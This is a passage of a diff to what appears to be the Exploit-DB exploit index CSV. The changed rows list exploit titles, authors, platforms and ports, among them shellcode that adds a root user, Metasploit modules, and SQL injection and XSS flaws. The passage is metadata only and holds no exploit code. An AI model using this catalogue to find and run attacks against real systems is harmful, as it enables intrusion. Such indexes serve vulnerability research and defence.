Add New Root User (ALI/ALI) & Execute /bin/sh",2014-08-04,"Ali Razmjoo",linux,shellcode,0 34263,platforms/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-04,Vulnerability-Lab,ios,webapps,8080 34264,platforms/ios/webapps/34264.txt,"FreeDisk 1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080 34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 - 'slideshow.js.php' Cross-Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 @@ -30870,12 +30881,14 @@ id,file,description,date,author,platform,type,port 34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 - 'install1.php' Cross-Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0 34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0 34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0 -34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0 +34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x_ 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0 34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80 -34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80 -34277,platforms/php/webapps/34277.txt,"Feng Office - Stored XSS",2014-08-06,"Juan Sacco",php,webapps,0 34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service Vulnerability",2010-07-12,"Tom Lane",linux,dos,0 34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service Vulnerability",2010-06-14,"Tom Lane",linux,dos,0 +34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80 +34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 - 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0 +34277,platforms/php/webapps/34277.txt,"Feng Office - Stored XSS",2014-08-06,"Juan Sacco",php,webapps,0 +34527,platforms/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution Vulnerability",2010-08-25,Kolor,windows,webapps,0 34280,platforms/php/webapps/34280.txt,"PHPFABER CMS 2.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-04,prodigy,php,webapps,0 34281,platforms/windows/dos/34281.py,"MP3 Cutter 1.8 MP3 File Processing Remote Denial of Service Vulnerability",2010-07-09,"Prashant Uniyal",windows,dos,0 34282,platforms/php/webapps/34282.txt,"Real Estate Manager 1.0.1 - 'index.php' Cross-Site Scripting Vulnerability",2010-07-09,bi0,php,webapps,0 @@ -30920,20 +30933,15 @@ id,file,description,date,author,platform,type,port 34322,platforms/php/webapps/34322.txt,"phpwcms <= 1.4.5 - 'phpwcms.php' Cross-Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 - 'modmenu.php' Cross-Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34324,platforms/php/webapps/34324.txt,"FestOS 2.3 - 'contents' Parameter Cross-Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0 -34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - (.plf) Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 -34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation",2014-08-13,metasploit,windows,local,0 -34334,platforms/win64/remote/34334.rb,"VirtualBox 3D Acceleration Virtual Machine Escape",2014-08-14,metasploit,win64,remote,0 +34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk products_search.php search_category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution",2014-08-14,metasploit,linux,remote,80 -34336,platforms/php/webapps/34336.html,"Disqus for Wordpress 2.7.5 Admin Stored CSRF and XSS",2014-08-14,"Nik Cubrilovic",php,webapps,80 -34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 - 'index.php' Cross-Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0 -34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-07-15,"High-Tech Bridge SA",php,webapps,0 -34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 - 'search.php' Cross-Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0 -34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service Vulnerability",2010-07-15,"Luigi Auriemma",multiple,dos,0 -34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 SQL Injection and HTML Injection Vulnerabilities",2009-09-21,learn3r,php,webapps,0 -34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster Multiple Cross-Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 +34334,platforms/win64/remote/34334.rb,"VirtualBox 3D Acceleration Virtual Machine Escape",2014-08-14,metasploit,win64,remote,0 +34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation",2014-08-13,metasploit,windows,local,0 +34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - (.plf) Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation Vulnerability",2007-12-17,"cp77fk4r ",asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection Vulnerabilities",2009-12-17,bi0,asp,webapps,0 34345,platforms/java/webapps/34345.txt,"jCore 'search' Parameter Cross-Site Scripting Vulnerability",2009-12-17,loneferret,java,webapps,0 +34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020 34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 - 'parametre' Parameter Remote Command Execution Vulnerability",2010-07-18,"Marshall Whittaker",cgi,webapps,0 34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - 'modrdn' Request Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0 34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Include Vulnerability",2010-07-18,eidelweiss,php,webapps,0 @@ -30949,8 +30957,6 @@ id,file,description,date,author,platform,type,port 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 - Cross-Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0 34360,platforms/multiple/dos/34360.txt,"Monolith Lithtech Game Engine - Memory Corruption Vulnerability",2010-07-21,"Luigi Auriemma",multiple,dos,0 34361,platforms/hardware/webapps/34361.txt,"Tenda A5s Router 3.02.05_CN - Authentication Bypass Vulnerability",2014-08-18,zixian,hardware,webapps,80 -34362,platforms/linux/remote/34362.rb,"Gitlab-shell Code Execution",2014-08-19,metasploit,linux,remote,443 -34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,metasploit,multiple,remote,0 34364,platforms/linux/dos/34364.html,"Qt <= 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption Vulnerability",2010-07-13,D4rk357,linux,dos,0 34365,platforms/php/webapps/34365.txt,"Claus Muus Spitfire 1.0.336 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-22,"High-Tech Bridge SA",php,webapps,0 34366,platforms/php/webapps/34366.txt,"Stratek Web Design Twilight CMS 4.0 - 'calendar' Cross-Site Scripting Vulnerability",2009-11-02,"Vladimir Vorontsov",php,webapps,0 @@ -30958,7 +30964,6 @@ id,file,description,date,author,platform,type,port 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - (.mp3) File Remote Buffer Overflow Vulnerability",2009-10-31,4m!n,windows,dos,0 34369,platforms/multiple/remote/34369.txt,"IBM Java UTF8 Byte Sequences Security Bypass Vulnerability",2010-07-23,IBM,multiple,remote,0 34370,platforms/jsp/webapps/34370.txt,"SAP Netweaver 6.4/7.0 - 'wsnavigator' Cross-Site Scripting Vulnerability",2010-07-23,"Alexandr Polyakov",jsp,webapps,0 -34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 - (.plf) Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 34372,platforms/multiple/remote/34372.txt,"PacketVideo Twonky Server 4.4.17/5.0.65 - Cross-Site Scripting and HTML Injection Vulnerabilities",2009-11-01,"Davide Canali",multiple,remote,0 34373,platforms/php/webapps/34373.txt,"MC Content Manager 10.1 SQL Injection and Cross-Site Scripting Vulnerabilities",2010-07-25,MustLive,php,webapps,0 34374,platforms/php/webapps/34374.txt,"Joomla! FreiChat Component 1.0/2.x Unspecified HTML Injection Vulnerability",2010-07-26,nag_sunny,php,webapps,0 @@ -30969,6 +30974,8 @@ id,file,description,date,author,platform,type,port 34379,platforms/php/webapps/34379.html,"SyndeoCMS 2.9 - Multiple HTML Injection Vulnerabilities",2010-07-26,"High-Tech Bridge SA",php,webapps,0 34380,platforms/asp/webapps/34380.txt,"Active Business Directory 2 - 'searchadvance.asp' Cross-Site Scripting Vulnerability",2009-12-22,"Andrea Bocchetti",asp,webapps,0 34381,platforms/php/webapps/34381.txt,"MyBB 1.8 Beta 3 - Multiple Vulnerabilities",2014-08-21,"DemoLisH B3yaZ",php,webapps,0 +34466,platforms/php/webapps/34466.txt,"CMS Source Multiple Input Validation Vulnerabilities",2010-08-13,"High-Tech Bridge SA",php,webapps,0 +34465,platforms/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,hardware,remote,22 34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Include Vulnerability",2010-07-27,"Harri Johansson",php,webapps,0 34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 - Cross-Site Scripting and Information Disclosure Vulnerabilities",2010-07-28,MaXe,jsp,webapps,0 34385,platforms/linux/remote/34385.txt,"KVIrc <= 4.0 - '\r' Carriage Return in DCC Handshake Remote Command Execution Vulnerability",2010-07-28,unic0rn,linux,remote,0 @@ -30984,6 +30991,8 @@ id,file,description,date,author,platform,type,port 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial Of Service Vulnerability",2010-08-03,"Rodrigo Escobar",windows,dos,0 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0 34397,platforms/asp/webapps/34397.txt,"Activedition 'activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0 +34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk reviews.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 +34498,platforms/php/webapps/34498.txt,"ViArt Helpdesk forum.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 34399,platforms/ios/remote/34399.txt,"Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities",2014-08-24,"Samandeep Singh",ios,remote,0 34400,platforms/php/webapps/34400.txt,"RaidenTunes 'music_out.php' Cross-Site Scripting Vulnerability",2014-08-03,LiquidWorm,php,webapps,0 34401,platforms/php/webapps/34401.txt,"PHP168 Template Editor 'filename' Parameter Directory Traversal Vulnerability",2009-10-04,esnra,php,webapps,0 @@ -31003,17 +31012,19 @@ id,file,description,date,author,platform,type,port 34417,platforms/php/webapps/34417.txt,"Prado Portal 1.2 - 'page' Parameter Cross-Site Scripting Vulnerability",2010-08-06,"High-Tech Bridge SA",php,webapps,0 34418,platforms/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting Vulnerability",2010-08-06,MustLive,php,webapps,0 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - XSS Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 -34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"Jos Tozo",cgi,webapps,80 +34420,platforms/cgi/webapps/34420.txt,"VTLS Virtua InfoStation.cgi - SQL Injection",2014-08-26,"José Tozo",cgi,webapps,80 34421,platforms/linux/local/34421.c,"glibc Off-by-One NUL Byte gconv_translit_find Exploit",2014-08-27,"taviso and scarybeasts",linux,local,0 -34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 +34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x - 4.1.2 (search.php cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80 34426,platforms/linux/remote/34426.txt,"uzbl \'uzbl-core\' \'@SELECTED_URI\' Mouse Button Bindings Command Injection Vulnerability",2010-08-05,Chuzz,linux,remote,0 34427,platforms/linux/dos/34427.txt,"OpenSSL - 'ssl3_get_key_exchange()' Use-After-Free Memory Corruption Vulnerability",2010-08-07,"Georgi Guninski",linux,dos,0 +34424,platforms/php/webapps/34424.txt,"WooCommerce Store Exporter 1.7.5 - Multiple XSS Vulnerabilities",2014-08-27,"Mike Manzotti",php,webapps,0 34428,platforms/windows/dos/34428.py,"Quintessential Media Player 5.0.121 - (.m3u) Buffer Overflow Vulnerability",2010-08-09,"Abhishek Lyall",windows,dos,0 34429,platforms/asp/webapps/34429.txt,"Allinta CMS 22.07.2010 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2010-08-09,"High-Tech Bridge SA",asp,webapps,0 34430,platforms/php/webapps/34430.txt,"Preation Eden Platform 27.7.2010 - Multiple HTML Injection Vulnerabilities",2010-08-09,"High-Tech Bridge SA",php,webapps,0 34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross-Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0 34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross-Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 - 'SDL2.php' Cross-Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0 +34456,platforms/php/webapps/34456.txt,"JBoard Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0 34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0 @@ -31034,7 +31045,6 @@ id,file,description,date,author,platform,type,port 34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 index.php URI XSS",2009-09-16,Moudi,php,webapps,0 34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 scrivi.php URI XSS",2009-09-16,Moudi,php,webapps,0 34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection Vulnerabilities",2010-08-12,Affix,php,webapps,0 -34456,platforms/php/webapps/34456.txt,"JBoard Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0 34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - NULL Pointer Dereference Denial Of Service Vulnerability",2009-08-14,"Luigi Auriemma",multiple,dos,0 34458,platforms/windows/dos/34458.html,"Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0 34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0 @@ -31043,8 +31053,6 @@ id,file,description,date,author,platform,type,port 34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass Vulnerability",2010-08-13,"Emmanuel Bouillon",windows,remote,0 34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0 34464,platforms/php/webapps/34464.txt,"SyntaxCMS 'rows_per_page' Parameter SQL Injection Vulnerability",2010-08-10,"High-Tech Bridge SA",php,webapps,0 -34465,platforms/hardware/remote/34465.txt,"F5 Big-IP - Unauthenticated rsync Access",2014-08-29,Security-Assessment.com,hardware,remote,22 -34466,platforms/php/webapps/34466.txt,"CMS Source Multiple Input Validation Vulnerabilities",2010-08-13,"High-Tech Bridge SA",php,webapps,0 34467,platforms/php/webapps/34467.txt,"Edit-X PHP CMS 'search_text' Parameter Cross-Site Scripting Vulnerability",2010-08-13,"High-Tech Bridge SA",php,webapps,0 34468,platforms/php/webapps/34468.html,"Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34469,platforms/php/webapps/34469.html,"Onyx Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 @@ -31072,9 +31080,6 @@ id,file,description,date,author,platform,type,port 34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk products.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 34495,platforms/php/webapps/34495.txt,"ViArt Helpdesk article.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 34496,platforms/php/webapps/34496.txt,"ViArt Helpdesk product_details.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 -34497,platforms/php/webapps/34497.txt,"ViArt Helpdesk reviews.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 -34498,platforms/php/webapps/34498.txt,"ViArt Helpdesk forum.php forum_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 -34499,platforms/php/webapps/34499.txt,"ViArt Helpdesk products_search.php search_category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 34500,platforms/multiple/remote/34500.html,"Flock Browser 3.0.0 Malformed Bookmark HTML Injection Vulnerability",2010-08-19,Lostmon,multiple,remote,0 34501,platforms/php/webapps/34501.txt,"Hitron Soft Answer Me 'answers.php' Cross-Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0 34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow Vulnerability",2009-08-09,"lvac lvac",windows,dos,0 @@ -31085,25 +31090,25 @@ id,file,description,date,author,platform,type,port 34507,platforms/linux/remote/34507.txt,"Nagios XI 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 34510,platforms/linux/dos/34510.txt,"OraclMySQL <= 5.1.48 - 'LOAD DATA INFILE' Denial Of Service Vulnerability",2010-08-20,"Elena Stepanova",linux,dos,0 -34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 +34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes (admin-ajax.php img param) - Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Stored XSS Vulnerability",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0 34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400 +35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash PoC",2014-12-23,"Drozdova Liudmila",windows,dos,0 34520,platforms/linux/dos/34520.txt,"Oracle MySQL <= 5.1.48 - 'HANDLER' interface Denial Of Service Vulnerability",2010-08-20,"Matthias Leich",linux,dos,0 34521,platforms/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0 34522,platforms/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0 34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0 34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Stored XSS (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 -34526,platforms/php/webapps/34526.pl,"vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit",2014-09-03,D35m0nd142,php,webapps,80 -34527,platforms/windows/webapps/34527.c,"Acunetix Web Vulnerability Scanner DLL Loading Arbitrary Code Execution Vulnerability",2010-08-25,Kolor,windows,webapps,0 -34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 - 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0 +34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 3.4 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0 +34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0 +34684,platforms/php/webapps/34684.pl,"Joomla Spain Component - 'nv' Parameter SQL Injection Vulnerability",2010-09-20,FL0RiX,php,webapps,0 34530,platforms/windows/dos/34530.py,"Crystal Player 1.98 - (.mls) Buffer Overflow Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0 34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting Vulnerability",2010-08-25,"Aung Khant",php,webapps,0 -34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0 34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 - 'autocms.php' Cross-Site Scripting Vulnerability",2010-08-23,"High-Tech Bridge SA",php,webapps,0 34534,platforms/php/webapps/34534.txt,"TCMS - Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 @@ -31126,6 +31131,7 @@ id,file,description,date,author,platform,type,port 34552,platforms/php/webapps/34552.txt,"LoadedCommerce7 - Systemic Query Factory Vulnerability",2014-09-07,Breaking.Technology,php,webapps,0 34553,platforms/php/webapps/34553.txt,"Wordpress Like Dislike Counter 1.2.3 Plugin - SQL Injection Vulnerability",2014-09-07,Att4ck3r.ir,php,webapps,0 34555,platforms/php/webapps/34555.txt,"PhpOnlineChat 3.0 - XSS",2014-09-07,"N0 Feel",php,webapps,0 +34604,platforms/php/webapps/34604.php,"BlueCMS 1.6 - 'X-Forwarded-For' Header SQL Injection Vulnerability",2010-09-06,cnryan,php,webapps,0 34558,platforms/php/webapps/34558.txt,"Amiro.CMS 5.8.4.0 - Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34559,platforms/php/webapps/34559.txt,"Rumba XML 2.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 34560,platforms/php/webapps/34560.html,"ArtGK CMS Cross-Site Scripting and HTML Injection Vulnerabilities",2010-09-01,"High-Tech Bridge SA",php,webapps,0 @@ -31134,12 +31140,13 @@ id,file,description,date,author,platform,type,port 34563,platforms/php/webapps/34563.txt,"OneCMS 2.6.1 - 'index.php' Cross-Site Scripting Vulnerability",2010-09-02,anT!-Tr0J4n,php,webapps,0 34564,platforms/php/webapps/34564.txt,"CMS WebManager-Pro 'c.php' SQL Injection Vulnerability",2010-09-02,MustLive,php,webapps,0 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting Vulnerability",2010-09-03,"Bogdan Calin",php,webapps,0 +34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80 +34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34571,platforms/php/webapps/34571.py,"Joomla Spider Calendar <= 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 34572,platforms/php/webapps/34572.txt,"Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF",2014-09-08,"Fikri Fadzil",php,webapps,0 -34578,platforms/php/webapps/34578.txt,"WordPress Acento Theme (view-pdf.php, file param) - Arbitrary File Download",2014-09-08,alieye,php,webapps,80 -34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.X - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 +34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.X - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 +34924,platforms/windows/webapps/34924.txt,"BMC Track-It! - Multiple Vulnerabilities",2014-10-09,"Pedro Ribeiro",windows,webapps,0 34582,platforms/php/webapps/34582.txt,"osCommerce 2.3.4 - Multiple vulnerabilities",2014-09-08,smash,php,webapps,80 34583,platforms/hardware/webapps/34583.txt,"TP-LINK Model No. TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 34584,platforms/hardware/webapps/34584.txt,"TP-LINK Model No. TL-WR841N / TL-WR841ND - Multiple Vulnerabilities",2014-09-08,smash,hardware,webapps,80 @@ -31150,8 +31157,8 @@ id,file,description,date,author,platform,type,port 34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0 34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0 34593,platforms/php/webapps/34593.txt,"Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities",2014-09-09,alieye,php,webapps,0 -34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80 +34603,platforms/windows/dos/34603.py,"Adobe Acrobat and Reader <= 9.3.4 - 'acroform_PlugInMain' Memory Corruption Vulnerability",2010-09-06,ITSecTeam,windows,dos,0 34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 SQL Injection and Cross-Site Scripting Vulnerabilities",2010-09-03,"Bogdan Calin",php,webapps,0 34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross-Site Scripting Vulnerability",2010-09-10,Moudi,php,webapps,0 34598,platforms/php/webapps/34598.txt,"SZNews 2.7 - 'printnews.php3' Remote File Include Vulnerability",2009-09-11,"kurdish hackers team",php,webapps,0 @@ -31159,8 +31166,6 @@ id,file,description,date,author,platform,type,port 34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter 